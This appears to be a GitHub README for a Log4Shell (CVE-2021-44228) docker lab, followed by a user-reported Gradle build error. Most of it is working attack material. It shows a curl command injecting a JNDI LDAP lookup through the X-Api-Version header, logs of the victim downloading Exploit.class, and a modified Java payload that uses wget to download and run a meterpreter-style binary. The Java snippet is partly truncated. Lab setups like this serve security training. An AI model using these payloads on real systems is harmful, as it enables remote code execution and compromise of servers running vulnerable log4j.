Log4shell docker lab using christophetd's vulnerable app and mbechler's marshalsec




All credits goes to the original authors. I just git-cloned and created a docker-compose file, that's all.


This repository contains a docker-compose setup which starts an attacker LDAP server and a victim web server that is vulnerable to log4shell (CVE-2021-44228).


Victim Web server - log4shell-vulnerable-app: A web server with log4j, vulnerable to first stage payload, which is the log4shell attack.

Attacker LDAP sever - marshalsec: A LDAP server that receives jndi request from the victim web server. Redirects the victim web server to attacker web server.

Attacker Web server: A python3 -m http.server server which hosts the second stage payload, which is the Exploit.class.


Start the victim web server and the attacker ldap server

docker-compose up --build 

Prepare the second stage payload. The port 8888 is hardcoded. To change this, modify ./marshalsec/Dockerfile.

cd ./attacker-webserver
python3 -m http.server 8888


// Attack with log4shell payload 
└─# curl <your-vm-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<your-vm-ip>:1389/Exploit}'    

Hello, world!

// Docker-compose's LDAP server replying to JNDI & victim web server downloading Exploit.class from the attacker web server 
log4shell-dockerlab-targetweb-1  |
log4shell-dockerlab-jndi-1       | Send LDAP reference result for Exploit redirecting to
log4shell-dockerlab-targetweb-1  | 2021-12-12 05:01:44,345 http-nio-8080-exec-7 WARN Error looking up JNDI resource [ldap://]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: Exploit cannot be cast to javax.naming.spi.ObjectFactory]; remaining name 'Exploit'
log4shell-dockerlab-targetweb-1  |      at com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1092)

// Attacker's web server sending second stage payload to the victim web server. This will get executed.
└─# python3 -m http.server 8888
Serving HTTP on port 8888 ( ... - - [12/Dec/2021 00:01:44] "GET /Exploit.class HTTP/1.1" 200 -

Check the attack poc

// Check docker ps and find out container ID of the "targetweb"
└─# docker ps
CONTAINER ID   IMAGE                           COMMAND                  CREATED             STATUS          PORTS                                       NAMES
1131d694c91a   log4shell-dockerlab_jndi        "/usr/local/bin/mvn-…"   51 minutes ago      Up 51 minutes>1389/tcp, :::1389->1389/tcp   log4shell-dockerlab-jndi-1
a2217b3781ad   log4shell-dockerlab_targetweb   "java -jar /app/spri…" 

// Check /tmp and validate the POC have worked 
└─# docker exec a2217b3781ad ls /tmp

Usage - Modified Payload

Instead of the Exploit.java POC, you can modify the payload.

Install JDK if you don't have one

apt install -y default-jdk 

Modify the PoC. For example, you can test with a metasploit's multi/script/web_delivery.

// Modified PoC to ship meterpreter instead of the original echo pwned > /tmp/log4shell-pwned payload. 

public class Rev {
    public Rev() {}
    static {
        try {
            String[] cmds = System.getProperty("os.name").toLowerCase().contains("win")
                    ? new String[]{"cmd.exe","/c", "calc.exe"}
                    : new String[]{"sh","-c", "wget -qO PqhJT1H2 --no-check-certificate; chmod +x PqhJT1H2; ./PqhJT1H2& disown"};
        }catch (Exception e){
    public static void main(String[] args) {
        Rev e = new Rev();

Compile the second stage. Make sure to target JDK 8, since the log4shell-vulnerable-app was built on JDK 8.

// Compile with JDK 8
javac --release 8 <your-payload>.java 

// Sanity check and make sure it's version 52.0 (jdk 8)
└─# file Rev.class
Rev.class: compiled Java class data, version 52.0 (Java 1.8)

Host the file, and attack again

python3 -m http.server 8888 
curl <your-vm-ip>:8080 -H 'X-Api-Version: ${jndi:ldap://<your-vm-ip>:1389/Exploit}'
ex) curl -H 'X-Api-Version: ${jndi:ldap://}'  







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  • Error when running docker-compose up --build

    Error when running docker-compose up --build

    I am running sudo docker-compose up --build. The build fails with the following error.

    Step 4/9 : RUN gradle bootJar --no-daemon ---> Running in 6babbb1e881d

    Welcome to Gradle 7.3.1!

    Here are the highlights of this release:

    • Easily declare new test suites in Java projects
    • Support for Java 17
    • Support for Scala 3

    For more details see https://docs.gradle.org/7.3.1/release-notes.html

    To honour the JVM settings for this build a single-use Daemon process will be forked. See https://docs.gradle.org/7.3.1/userguide/gradle_daemon.html#sec:disabling_the_daemon. Daemon will be stopped at the end of the build

    FAILURE: Build failed with an exception.

    • Where: Build file '/home/gradle/src/build.gradle' line: 2

    • What went wrong: Plugin [id: 'org.springframework.boot', version: '2.6.1'] was not found in any of the following sources:

    • Gradle Core Plugins (plugin is not in 'org.gradle' namespace)
    • Plugin Repositories (could not resolve plugin artifact 'org.springframework.boot:org.springframework.boot.gradle.plugin:2.6.1') Searched in the following repositories: Gradle Central Plugin Repository
    • Try:

    Run with --stacktrace option to get the stack trace. Run with --info or --debug option to get more log output. Run with --scan to get full insights.

    • Get more help at https://help.gradle.org

    BUILD FAILED in 9s ERROR: Service 'targetweb' failed to build: The command '/bin/sh -c gradle bootJar --no-daemon' returned a non-zero code: 1

    Running on Ubuntu 20.04 with a fresh install of Docker and Docker-compose.

    Please advise.

    opened by Dave-0-0 2
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